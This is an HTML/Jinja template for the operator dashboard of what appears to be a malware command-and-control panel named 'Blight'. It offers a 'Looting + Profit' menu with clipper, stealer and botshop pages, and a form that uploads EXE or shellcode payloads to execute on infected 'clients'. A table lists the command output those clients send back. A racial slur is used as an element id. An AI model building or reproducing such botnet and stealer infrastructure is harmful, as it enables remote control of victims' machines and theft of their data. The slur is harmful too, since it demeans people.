<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blight - Individual</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css">
    <link rel="stylesheet" href="{{ url_for('static',filename='css/style.css') }}">
</head>

<body>
    <div id="overlay"></div>
    <div class="container">
        <aside class="sidebar">
            <div class="logo">
                <img src="https://i.ibb.co/zVF2SSZ/image-removebg-preview-3.png">
                <h1 class="work-sans">Blight</h1>
            </div>
            <div class="sidebar-list-container">
                <ul>
                    <li><p class="work-sans-light">Client Managment</p></li>

                    <li><a href="clients" class="work-sans-normal sidebar-link"><i class="fas fa-user"></i>Clients</a></li>
                    <li><a href="loader" class="work-sans-normal sidebar-link"><i class="fas fa-upload"></i>Loader</a></li>

                    <li><p class="work-sans-light">Server Managment</p></li>

                    <li><a href="firewall" class="work-sans-normal sidebar-link"><i class="fas fa-ban"></i>Firewall</a></li>
                    <li><a href="server_logs" class="work-sans-normal sidebar-link"><i class="fas fa-code"></i>Server Logs</a></li>
                    <li><a href="settings" class="work-sans-normal sidebar-link"><i class="fas fa-cog"></i>Settings</a></li>

                    <li><p class="work-sans-light"> Looting + Profit</p></li>

                    <li><a href="clipper" class="work-sans-normal sidebar-link"><i class="fas fa-clipboard"></i>Clipper</a>
                    <li><a href="stealer" class="work-sans-normal sidebar-link"><i class="fas fa-mask"></i>Stealer</a></li>
                    <li><a href="botshop" class="work-sans-normal sidebar-link"><i class="fas fa-robot"></i>Botshop</a></li>
                </ul>
            </div>
        </aside>

        <main class="content">

            <br>

            <div class="forms">
                <button onclick="openLightbox(0)" class="loadCreationButton">
                    <i class="fa-solid fa-file"></i>
                    Execute On Client
                </button>
            </div>

            <div id="lightboxesContainer">

                <div class="lightbox">
                    <div class="forms">
                        <div class="form-container">
                        
                            <h1 class="work-sans-light"><center>Payload Execution</center></h1>
                            <hr>
                            <form action="#" method="post"  enctype=multipart/form-data>
                                <label for="name">Execution Type</label>
                                <select name="execution_type">
                                    <option value=".EXE | DOTNET Execution">.EXE | DOTNET Execution</option>
                                    <option value=".BIN | Shellcode Execution">.BIN | Shellcode Execution</option>
                                    <option value=".EXE | Native Execution">.EXE | Native Execution</option>
                                </select>

                                <label for="message">Payload</label>
                                <input name="payload" type="file">

                                <input id="nigga" type="submit" value="Submit">
                            </form>
                        </div>
                    </div>
                </div>
            </div>
          
            <table>
                <thead>
                    <tr>
                        <th>Command Type</th>
                        <th>Command Args</th>
                        <th>Output</th>
                        <th>Time To Complete</th>
                        <th>Time Recieved</th>
                    </tr>
                </thead>
                <tbody>
                    {% for output in new_outputs_list %}
                    <tr>
                        <td>{{ output.cmd_type }}</td>
                        <td>{{ output.cmd_args }}</td>
                        <td>{{ output.output }}</td>
                        <td>{{ output.time_to_complete }}</td>
                        <td>{{ output.time_recieved }}</td>
                    </tr>
                    {% endfor %}
                </tbody>
            </table>


        </main>

    </div>
    <script>

        function delete_block(block_id) {
            var url = new URL(window.location.href);
            var params = new URLSearchParams(url.search);

            params.set('delete_block', block_id);
            url.search = params.toString();
            document.location.href = url.toString();
        }

        var lightboxesContainer = document.getElementById("lightboxesContainer");
        var lightboxes = Array.from(lightboxesContainer.getElementsByClassName("lightbox"));

        for (let lightbox of lightboxes) {
            lightbox.style.opacity = "0";
            lightbox.style.pointerEvents = 'none';
            document.getElementById("overlay").style.opacity = "0";
        }

        function openLightbox(index) {
            lightboxes[index].style.opacity = "1";
            lightboxes[index].style.pointerEvents = 'auto';
            document.getElementById("overlay").style.opacity = ".7";
        }

        function closeLightbox() {
            for (let lightbox of lightboxes) {
                lightbox.style.opacity = "0";
                lightbox.style.pointerEvents = 'none';
                document.getElementById("overlay").style.opacity = "0";
            }
        }
    </script>
</body>

</html>Lua ExecutionLua Execution